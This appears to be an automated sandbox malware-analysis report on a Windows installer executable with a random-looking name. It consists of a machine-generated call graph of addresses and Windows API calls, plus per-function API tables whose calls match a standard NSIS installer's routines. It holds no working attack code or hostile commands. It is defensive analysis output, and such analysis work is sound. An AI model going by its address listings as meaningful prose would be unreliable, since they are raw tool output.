3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                Executed Functions

                                                Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406902
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                • EmptyClipboard.USER32 ref: 0040543D
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                • CloseClipboard.USER32 ref: 0040549A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                • String ID: New install of "%s" to "%s"${
                                                • API String ID: 2110491804-1641061399
                                                • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                APIs
                                                • #17.COMCTL32 ref: 004038CE
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                • OleInitialize.OLE32(00000000), ref: 004038E0
